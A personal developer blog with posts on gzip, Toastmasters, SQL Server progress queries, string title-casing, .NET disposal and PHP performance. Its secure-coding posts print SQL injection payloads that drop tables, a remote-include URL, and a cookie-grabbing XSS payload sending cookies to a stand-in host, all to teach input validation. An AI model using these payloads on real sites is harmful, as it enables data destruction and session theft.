Blog

In a data load, we receive some zipped files (*.gz). I found that when you use the regular extraction:

gzip.exe -d -f "foo.csv.gz"

gzip will automatically delete the “foo.csv.gz” file and replace it with “foo.csv”.

However, archiving the extracted csv files would take up a fair bit more space, so we wanted to store only the compressed version of each flat file.

Originally I thought that I was going to need to unzip them, then rezip all of the files at the end of the process to get them ready for archival, but this was just a lot of extra processing.

Finally I came across a way to avoid the deletion of the file. If you output the file to standard out, you are able to redirect that output stream into your output file (without affecting the original .gz file).

Verdict:

gzip.exe -d -f -c "foo.csv.gz" > foo.csv

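The -c option makes gzip push the decompressed contents of the gz file to STDOUT, and the > then redirects everything written to STDOUT into the CSV file where we need it. Because nothing is extracted in place, the original .gz file is left alone. Newer versions of gzip (1.6 and later) also have a -k (--keep) option that keeps the input file.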
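If the load is driven from a script rather than the command line, the same idea can be sketched in Python. This is only a rough equivalent, not part of the original process: the function name extract_keep_original and the file names are made up for illustration, and it relies on nothing beyond the standard gzip and shutil modules.

```python
import gzip
import shutil


def extract_keep_original(gz_path, out_path):
    """Decompress gz_path into out_path, leaving gz_path where it is."""
    # gzip.open streams the decompressed bytes, much like `gzip -d -c`
    with gzip.open(gz_path, "rb") as src, open(out_path, "wb") as dst:
        # copyfileobj copies in chunks, so large files are not loaded at once
        shutil.copyfileobj(src, dst)


if __name__ == "__main__":
    import os
    import tempfile

    # Build a small throwaway archive so the sketch runs on its own
    with tempfile.TemporaryDirectory() as workdir:
        gz_file = os.path.join(workdir, "foo.csv.gz")
        csv_file = os.path.join(workdir, "foo.csv")
        with gzip.open(gz_file, "wb") as f:
            f.write(b"id,name\n1,example\n")
        extract_keep_original(gz_file, csv_file)
        print(os.path.exists(gz_file), os.path.exists(csv_file))
```

Since the archive is only ever opened for reading, there is nothing to rezip afterwards.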

Hope this helps

Reference: http://stackoverflow.com/questions/7351887/gzip-extracting-without-deleting-zip-file

Posted in tools

Tags:

When I was on my second Co-op work term, one of my bosses had suggested to me that I join Toastmasters. What is Toastmasters? It is an organization which was formed to help people to work on their public speaking skills. This past year when writing up my personal goals, I finally decided that it was time to take this advice.

I started visiting a club near my house back in January, and man was I impressed. Not only at the professionalism of the group, but at how friendly and warm everyone around you was. This was truly a safe place to go for people who lack confidence in their speaking. That night, I heard speeches from three different club members of varying levels. Man, these were impressive. Some of the speakers I swore were professionals. Along with that, I got to partake in Table Topics, which is essentially a way to get you to start talking off the top of your head on a topic that has just been presented to you. I was incredibly nervous.

I still remember it. I had to talk for 30 seconds to a minute about pasta (the topic for the day was nutrition). What am I to say?

Three weeks later, I became a member. Shortly after that, I started taking on roles at the meeting in order to increase my speaking time a bit.

My first role was the Timer. Sitting and listening to the timer’s little blurb at the beginning each and every week, I thought to myself that I could easily do it. And then it was my time to speak, and I froze. I felt like a babbling fool, not able to formulate my thoughts properly despite the fact that I had said it to myself several times before that.

I went on to do a few more roles in the weeks to come in order to help raise my confidence and get used to the nervous feeling a little more and more each week. It was working. People around me had started noticing slight improvements in my speaking.

This week was my Ice Breaker. I spoke about my dog and how having him influenced what I eventually saw as my career path. When did I actually write the Ice Breaker? Saturday. Was I 100% ready for it? Probably not. But even though I didn’t feel 100% prepared (i.e. I didn’t have the entire speech memorized), I still felt I needed to get up and do it, otherwise I would just keep putting it off. So, I took the plunge.

Man it felt weird! The minute I got up there in front of everyone, my mind went blank. I had practiced my speech several times both in front of my family and by myself, but saying it in front of 30 unfamiliar faces felt completely different. The first thing that I noticed was that time flew. The speech that I had timed to be 5 minutes and 40 seconds turned into a 6 minute and 29 second speech, 29 seconds over the time limit. Mentally I knew that I knew the contents of the speech because I lived it and I had practiced my wording of it. But then as soon as I got up there, everything changed. I tried not to use my notes, but every once in a while I needed that little cue. Not only that, but as soon as I started talking, my mind felt like it was 2 paragraphs ahead of what my mouth was actually saying. I was so confused. In the end, I think I got my daily exercise from the amount of nervous walking that I did, and I hope that I wasn’t just muttering words, which I felt that I was at times (everything felt so disjointed in my head, but that could just be my interpretation).

The group was entirely understanding of the feat that I had just gone through. No matter how badly I felt I screwed it up, the rest of the club seemed to cheer me on, which felt good. I know it wasn’t the best speech anyone had ever heard, but what the heck, it was my first one.

I look forward to writing and practicing my second speech hoping that the next time I go up maybe my mind will be a little more clear.

I encourage anyone who feels that they lack the confidence in their verbal communication skills to try a Toastmasters club near you. I’ve been a member since February and no two meetings are the same, and I actually feel kind of sad when I am not actually able to make it to the Wednesday night meeting.

I would strongly encourage anyone to find one in your area to try it out. You won’t regret it!

Thanks for reading

Posted in php

Tags:

With databases sometimes you need to run tasks that take a while in order to complete. In the past I have found it hard to judge the status of a request. For example, we do backups and restores of a 40 GB database.

Normally this doesn’t take very long to accomplish (30-40 minutes), but there is no sort of progress bar on the query to judge how complete a specific task is. Luckily, after hunting through Google for a while, I found a query that you are able to run to find how complete system tasks are. The query is as follows:


SELECT session_id, command, percent_complete FROM sys.dm_exec_requests

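This query will return a list of the commands currently running as well as the percentage complete. The percent_complete column is only filled in for certain long-running commands such as BACKUP and RESTORE; for everything else it stays at 0.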

session_id command percent_complete
## BACKUP DATABASE 25.6985%
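Once you have the percentage, a rough time-remaining figure is simple arithmetic. The sketch below is my own illustration and not something SQL Server gives you: the function name is made up, the elapsed time is something you would measure yourself, and it assumes the task keeps progressing at the same rate, which a backup or restore will not always do.

```python
def estimate_remaining_minutes(percent_complete, elapsed_minutes):
    """Linear estimate of the minutes left, assuming a constant rate of progress."""
    if not 0 < percent_complete <= 100:
        raise ValueError("percent_complete must be greater than 0 and at most 100")
    # If percent_complete percent took elapsed_minutes, scale up to 100 percent
    total_minutes = elapsed_minutes * 100.0 / percent_complete
    return total_minutes - elapsed_minutes


if __name__ == "__main__":
    # Hypothetical reading: 25% done after 10 minutes
    print(estimate_remaining_minutes(25.0, 10.0))
```

Treat the result as a ballpark figure only; re-running the query a few minutes apart gives a better feel for how steady the rate really is.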

Posted in sql-server

Tags:

sql

Problem:

Capitalizing the first character of each word in a string (i.e. “the final countdown” → “The Final Countdown”).

Solution:

C#:

C# has a built-in function for this. It's called ‘ToTitleCase’, hidden deep within the System.Globalization namespace.

So how do you use it?


using System.Globalization;
 
...
// TextInfo has no public constructor, so get the instance from the current thread's culture
TextInfo info = (System.Threading.Thread.CurrentThread.CurrentCulture).TextInfo;
 
string sample = "hello world";
 
// Print to console the title case
// Outputs: Hello World
Console.WriteLine(info.ToTitleCase(sample));

The ‘ToTitleCase’ function returns a new string in which the first character of each word is changed to upper case and the rest of the word is changed to lower case. The one exception is a word that is entirely in capital letters: it is treated as an acronym and left as is. A simple work around for this is to call the string object’s ‘ToLower’ function before we send the string into the ‘ToTitleCase’ function.

For example,

using System.Globalization;
 
...
// TextInfo has no public constructor, so get the instance from the current thread's culture
TextInfo info = (System.Threading.Thread.CurrentThread.CurrentCulture).TextInfo;
 
string sample = "HELLO world";
 
// Print to console the title case
// Emits: HELLO World
Console.WriteLine(info.ToTitleCase(sample));
 
// Pre-lowercase everything
// Emits: Hello World
Console.WriteLine(info.ToTitleCase(sample.ToLower()));

PHP:

The PHP version of this function is a fair bit easier to get to. PHP’s function is called ‘ucwords’. However, similar to the C# version, you should always pass the string in as lower case if you want only the first character of each word to be upper case (it only changes the first character and doesn’t touch the others).


// Outputs: The Final Countdown
echo ucwords('the final countdown');
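To make the "only touches the first character" behaviour concrete, here is a small Python sketch of the same idea. The helper names ucwords_like and title_case are mine, not part of any library, and unlike the real ucwords this version only treats spaces as word separators.

```python
def ucwords_like(text):
    """Upper-case the first character of each space-separated word, leave the rest alone."""
    return " ".join(word[:1].upper() + word[1:] for word in text.split(" "))


def title_case(text):
    """Lower-case everything first, so words in all capitals are normalised too."""
    return ucwords_like(text.lower())


if __name__ == "__main__":
    print(ucwords_like("HELLO world"))  # the all-caps word is left untouched
    print(title_case("HELLO world"))    # lower-casing first evens everything out
```

The second helper is the same "lower case it first" work around described above for both C# and PHP.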

Posted in programming

Tags:

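I was implementing an image resizer and I kept getting error messages saying that the image file was in use, even after I disposed of the object in memory (the last step was to remove the unresized image).

Calling Dispose() on an object releases the resources held by that object straight away, but only for the object you call it on. In the code below, the only thing that gets disposed is the resized image. The Image returned by Image.FromFile(file) is never assigned to a variable and never disposed (assuming ResizeImage returns a new Image rather than the one passed in), so it keeps the file locked until the garbage collector gets around to finalizing it. This means that the file won’t be able to be deleted immediately.

In order to get around this, you can call the garbage collector yourself to force the application to get rid of the object from memory. (The cleaner fix is to keep a reference to the original Image and dispose of it as well, which releases the file without forcing a collection.)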

The code:


string dest = @"C:\";
FileInfo imageFile = new FileInfo(file);
Image image = ResizeImage(Image.FromFile(file),size);
 
// Save the file to the file system
SaveAsJpeg(image, dest + imageFile.Name, 100);
 
// We don't need the resized image in memory any more, so release it
image.Dispose();
 
// Call the garbage collector
GC.Collect();
GC.WaitForPendingFinalizers();
 
// Delete the old file
imageFile.Delete();

Posted in php

Tags:

Just because PHP allows you to do something doesn't mean that it is the best thing to do. For example, PHP will automatically convert a bare word (one not delimited by quotes or apostrophes) into an actual string if no constant with that name exists.


$arr = array();

for($x=0;$x<1000000;$x++)
{
    $arr[foo]='bar';
}

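In this case, PHP looks for a constant named foo, fails to find one, and falls back to the string 'foo'. However, this conversion doesn't come without a cost: the failed lookup and the notice it raises are repeated on every pass through the loop. (Newer versions are stricter still: PHP 7.2 deprecated the fallback, and PHP 8 throws an error instead.) For example, when timing this script, the following are the results: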

$ time php test.php 

real    0m1.641s
user    0m1.424s
sys     0m0.044s

However, when running the following script, which doesn't force PHP to do the conversion, the results are extremely different.


$arr = array();

for($x=0;$x<1000000;$x++ )
{
    $arr['foo']='bar';
}

In this case, 'foo' is already written as a string literal, so no conversion is required. The time for this is as follows:

$ time php test.php 

real    0m0.467s
user    0m0.292s
sys     0m0.052s

As you can see, by including the quotes and telling PHP that it actually is a string, you can potentially reduce the execution time for your PHP scripts.

Keep this in mind when using the associative arrays in PHP.

Posted in php

Tags:

I must first start this post with a comic on the topic ... it comes from xkcd.com.

Exploits of a Mom

Anyways, this shows one of the many reasons why one should never trust any input from a user. This means that you should assume that all users have malicious intent and are attempting to break into your site. Of course, this is not always the case; however, when it is, bad things can happen all around. No matter how you are getting data from the user, be it through an input field, URL, hidden field, drop down list, etc., users are able to change the information to better suit their attacking desires. This means always make sure that the data is within the bounds of what is expected!

What are some examples of bad things which can happen from the use of exploits? I have listed two of the more common threats which I see on a day-to-day basis.

  • SQL Injection - As portrayed in the comic from XKCD, if the correct security precautions are not in place, anything which is stored in your database can be eliminated within seconds or, worse, modified in a manner you are not able to notice until it's too late. For example, say one is working on a website which has a built-in 'karma' system, where the higher a user's 'karma', the more things they are allowed to do on the site. If the website allows for SQL injection (accidentally of course), what is to stop the user from slowly increasing their 'karma' at a gradual rate until they are in a new 'karma' category? Would this be noticeable? Probably not. Either way, if the attacker truncates or deletes your tables, or even updates their records a bit to get more out of the site than they have earned, these are all bad things which could happen ... and can easily be prevented by becoming aware of what is going on around you.
  • Cross Site Scripting (XSS) - Security flaws unintentionally coded into applications which allow a user to inject special code onto a site, which can be extremely detrimental to any site. A simple example of XSS would be a cookie grabber. A fair number of the cookie grabbers I have seen come from the use of BBCode and the lack of proper validation for it. The theory behind a simple cookie grabber is that it will use any pre-existing javascript on the site (or use its own) in order to send site-specific information to a different source. However, cookie grabbers are not the only problem. If the correct precautions are not in place, the use of PHP's "include" or "require" function can have your site acting as a portal through the internet for anybody to use as they please (strictly speaking this one is a remote file inclusion hole rather than XSS, but it comes from the same misplaced trust in user input). Similar to SQL injection, this can be prevented with the proper knowledge.

Examples!

SQL Injection

Just say you have a form where you allow the user to select how many records they want to display:

<form method = "post" action = "results.php">
How many records should be displayed?
  <select name = 'count'>
    <option value = '5'>5</option>
    <option value = '10'>10</option>
    <option value = '15'>15</option>
  </select>
  <input type = 'submit' />
</form>

And the back end of your application looks something like this:


    $query = "SELECT * FROM `news` LIMIT " . $_POST["count"];
    $res = mysql_query($query);

What is to stop the user from modifying one of the values in the drop down list to:


5; DROP TABLE `news`;

Nothing! If you don't prevent such a thing from being allowed in your query (i.e. not doing enough data validation), then once that query runs your entire 'news' table can be dropped from the system, which was probably not what was originally intended for the script. (mysql_query() itself only sends one statement per call, so whether this exact payload succeeds depends on the database API in use, but the hole is the same either way.) I have mentioned this method of prevention before, and I'll mention it again: SQL prepared statements. If data is sent in as a parameter rather than as a direct part of the query, there is no chance that it will be mistaken for SQL and have two queries execute instead of one.

Cross Site Scripting (XSS)

These security vulnerabilities can be fairly hard to track down, however there is always a way.

Simple XSS

Just say you have your URLs as something like this: http://url.com/read.php?file=temp.php, where in your actual PHP script you have a server side include for whatever value was passed in through $_GET. Well, this is opening up an entirely new can of worms. Yes, it works for pages which are on your server; however, it will also work for pages which are off site if you are not careful in your validation. Sample Code:


// This is a VERY bad idea, however it is only an example
include($_GET['file']);

If I were to change the URL from: http://url.com/read.php?file=temp.php To: http://url.com/read.php?file=http://www.google.com, then on a server where remote includes are allowed (the allow_url_include setting), PHP will not think anything of it. It will treat the website as a file stream just as it does the 'temp.php' which was originally passed in. And lo and behold, somebody is now using your site to access Google, or worse, to run a script of their own on your server. Lesson: validate and verify that the file exists LOCALLY before running the include.

Cookie Grabber

Since cookies are only accessible on the site which they are associated with, cookie grabbers must run on that site in order to get the information they need. A fair number of implementations of BBCode which I have seen have allowed for gaping holes because of this. For example, most implementations use regular expressions in order to pick up on the required information (which is what they should be used for). However, since URLs and things can have a large number of characters, most programmers choose to use the greedy approach and use the 'anything but newline character' (the period). Regex (something similar to this, as I cannot remember the exact regular expression):

\[img=(.*)\]

This regular expression will then be replaced in the emitted HTML code to be:

<img alt="" src="$1" />

This is all fine and dandy, and it picks up what is required; however, it also has the ability to pick up more than expected and/or desired. For example, if the following was provided, it would allow the attacker to gain access to the cookies of anyone visiting that particular site.

[img=http://www.google.ca/logos/gabor10-hp.png" onclick="document.location.href='http://some_other_url.com/cookies.php?cookie='+document.cookie]

This has the potential for changing the emitted HTML into becoming:

<img alt="" src="http://www.google.ca/logos/gabor10-hp.png" onclick="document.location.href='http://some_other_url.com/cookies.php?cookie='+document.cookie" />

When the image is clicked, this effectively causes your web browser to relocate to a different URL with your cookie in the link, which the attacker will then log for future use. Of course, if a little extra time is spent on sanitizing the input, problems like this can be filtered out.
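To show the difference a stricter pattern makes, here is a rough Python sketch of both approaches. It is not taken from any real BBCode library: the function names and the strict pattern are my own, and the strict version deliberately rejects any URL containing an ampersand, which is more restrictive than a real site would probably want.

```python
import html
import re

# Greedy pattern similar to the one described above: anything up to the last ]
GREEDY = re.compile(r"\[img=(.*)\]")

# Stricter pattern: an http(s) URL with no whitespace, no ] and no &.
# After html.escape every quote or angle bracket starts with &, so none can match.
STRICT = re.compile(r"\[img=(https?://[^\s\]&]+)\]")

PAYLOAD = (
    '[img=http://www.google.ca/logos/gabor10-hp.png" '
    'onclick="document.location.href=\'http://some_other_url.com/cookies.php'
    '?cookie=\'+document.cookie]'
)


def render_greedy(bbcode):
    """Vulnerable: the captured text is dropped into the attribute as-is."""
    return GREEDY.sub(r'<img alt="" src="\1" />', bbcode)


def render_strict(bbcode):
    """Escape everything first, then only convert tags that hold a plain URL."""
    escaped = html.escape(bbcode, quote=True)
    return STRICT.sub(r'<img alt="" src="\1" />', escaped)


if __name__ == "__main__":
    print(render_greedy(PAYLOAD))
    print(render_strict(PAYLOAD))
    print(render_strict("[img=http://www.google.ca/logos/gabor10-hp.png]"))
```

With the strict version the malicious tag is simply left on the page as harmless escaped text, while a well-formed image tag is still converted.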

Summary: In summary, never ever ever trust a user's input. It will only lead you towards worlds of pain. Hope this helps!

Posted in php

Tags:

I have recently seen posted numerous times that if you run the function 'mysql_real_escape_string' on any data, you are then automatically safe from SQL injection. Well, this isn't the case at all ... To start, let's look at what php's documentation about 'mysql_real_escape_string' says: php.net

Escapes special characters in the unescaped_string, taking into account the current character set of the connection so that it is safe to place it in a mysql_query(). If binary data is to be inserted, this function must be used. mysql_real_escape_string() calls MySQL's library function mysql_real_escape_string, which prepends backslashes to the following characters: \x00, \n, \r, \, ', " and \x1a. This function must always (with few exceptions) be used to make data safe before sending a query to MySQL.

So, not only does it force you to have the mysql connection (why is this really needed for just escaping a few characters?), it just adds a '\' before some of the characters which could break a query. This is because lots of people write queries as follows:


$query = "SELECT `user_id`, `username`, `startdate` FROM `users` WHERE `username` = '$username'";

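However, if $username contains "blarg'; DROP TABLE `users`; --", then mysql_real_escape_string will change it to "blarg\'; DROP TABLE `users`; --", which will not break the query (so the users table will not be dropped). But the escaping only covers the characters listed above, in the form in which they arrive. If the attacker was smarter and sent the apostrophe in an encoded form such as &#39; (39 is the decimal character code for '; in hexadecimal it is 27, as in the URL-encoded %27), mysql_real_escape_string will not touch it. MySQL does not decode such sequences itself, but if any part of your application decodes them after the escaping step, the raw apostrophe is back in your query and can inconveniently drop your table. Escaping also does nothing for values placed in a query without surrounding quotes, such as a numeric ID or a LIMIT count, because there is no quoted string to break out of. This small example shows that the use of 'mysql_real_escape_string' on its own is not enough to prevent SQL injection. Instead of relying on 'mysql_real_escape_string', I would strongly suggest the use of database parameters (prepared statements) for all queries, or at the very least decoding any encoded input (i.e. html special chars decode) before escaping and validating it, just to make sure that characters you don't want to be in there don't sneak in.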
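For anyone who has not seen a parameterised query before, here is a minimal sketch of the idea. It uses Python with an in-memory SQLite database purely so that it runs anywhere; in PHP you would use the prepared statement support in PDO or mysqli instead. The helper names and the sample row are made up for illustration.

```python
import sqlite3


def make_demo_db():
    """Create a throwaway in-memory database with one user in it."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT)")
    conn.execute("INSERT INTO users (username) VALUES ('blarg')")
    conn.commit()
    return conn


def find_user(conn, username):
    """Look a user up by name, passing the name as a parameter."""
    # The ? placeholder means username is sent as data, never as SQL text
    cur = conn.execute(
        "SELECT user_id, username FROM users WHERE username = ?",
        (username,),
    )
    return cur.fetchall()


if __name__ == "__main__":
    conn = make_demo_db()
    print(find_user(conn, "blarg"))
    # The injection attempt is just treated as a (non-existent) username
    print(find_user(conn, "blarg'; DROP TABLE users; --"))
    print(conn.execute("SELECT COUNT(*) FROM users").fetchone()[0])
```

Because the value never becomes part of the SQL text, there is nothing to escape and nothing for an encoded apostrophe to sneak past.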

Posted in php

Tags: